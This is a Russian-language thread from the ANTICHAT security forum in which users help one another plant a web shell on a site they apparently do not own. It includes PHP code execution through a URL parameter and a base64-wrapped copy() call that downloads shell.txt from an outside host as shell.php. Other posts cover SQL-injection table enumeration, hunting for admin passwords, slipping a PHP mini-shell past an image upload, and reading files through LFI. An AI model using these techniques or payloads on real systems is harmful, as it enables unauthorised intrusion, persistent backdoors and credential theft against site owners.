ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.

Есть выполнение php скрипта на сайте, как залить шелл?

http://www.site.com/index.php?s=10&id=phpinfo();

mq=on

base64_decode([]);

где [] — copy('http://site1.tu/shell.txt', './shell.php'); в base64

так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.

а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)

пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию

Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать?

Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки.

Кто что посоветует сделать?

базы тоже проверял, только две - information_schema и текущяя

где про это можно поподробнее прочитать??

о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль

command denied to user - file_priv нету

(читалка это я так понимаю из розряда LFI??)